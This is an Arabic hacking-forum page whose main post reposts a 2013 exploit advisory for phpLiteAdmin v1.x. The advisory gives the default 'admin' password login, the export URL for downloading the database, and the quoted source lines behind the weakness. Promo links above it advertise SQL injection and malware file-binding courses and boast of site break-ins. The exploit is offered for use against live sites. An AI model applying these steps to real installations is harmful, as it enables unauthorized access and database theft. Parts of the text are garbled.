1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ ثغره ] phpLiteAdmin v1.X.X Auth Bypass/Download DB vulnerabilities

الموضوع في '[ ثــغـرات الأعــضــاء]' بواسطة Ubuntu, بتاريخ ‏14 ديسمبر 2013.

كاتب الموضوع : Ubuntu المشاهدات : 621 الردود : 0 ‏14 ديسمبر 2013
حالة الموضوع:
مغلق
  1. غير متصل

    Ubuntu
    rankrank
    Developer

    عضو منذ:
    ‏6 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله تعالى وبركاته


    لما تدخل على واجهة الموقع الباسورد هو :admin
    لتحميل قاعدة البيانات:127.0.0.1/phpliteadmin.php?view=export
    و اضغط على export

    كود PHP:
    X-------------------------------------------------------------X
     _____ _   _ _   _ _____ _____ _____  ___   _   _   _______   _______ ___________ 
    |_   _| | | | \ | |_   _/  ___|_   _|/ \ | \ | | /  __ \ \ / / ___ \  ______ \
      | | | | | |  \| | | | \ `
    --.  | | / /_\ \|  \| | | /  \/\ V /| |_/ / |__ | |_/ /
      | | | | | | . 
    ` | | |  `--. \ | | |  _  || . ` | | |     \ / | ___ \  __||    / 
      | | | |
    _| | |\  |_| |_/\__/ /_| |_| | | || |\  | | \__/\ | | | |_/ / |___| |\ \ 
      \
    _/  \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/  \____/ \_/ \____/\____/\_| \_|
    X-------------------------------------------------------------X                                                                                  
     
     
    ***91;+***93AuthorTUNISIAN CYBER
    ***91;+***93Exploit TitlephpLiteAdmin v1.X.X Auth Bypass/Download DB vulnerabilities
    ***91;+***93Date8-12-2013
    ***91;+***93CategoryWebApp
    ***91;+***93Google Dorkn/a
    ***91;+***93Tested onWin7 ubuntu 13.04
     
     
    ########################################################################################

    1Auth Bypass:
    127.0.0.1/phpliteadmin.php

    username
    admin

    Source Code 
    (lines 35--->36) (v1.6)

    //password to gain access (change this to something more secure than 'admin')
    $password "admin";

    Source Code (lines 47--->48) (1.9.4.1)
    //password to gain access
    $password 'admin';

    2/Download DB:
    127.0.0.1/phpliteadmin.php?view=export
    Go To 
    "Save As" then click "Export"

    Sites that could be infected85/100

    ./3nD
    ########################################################################################
     


    جاري تحميل الصفحة...
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...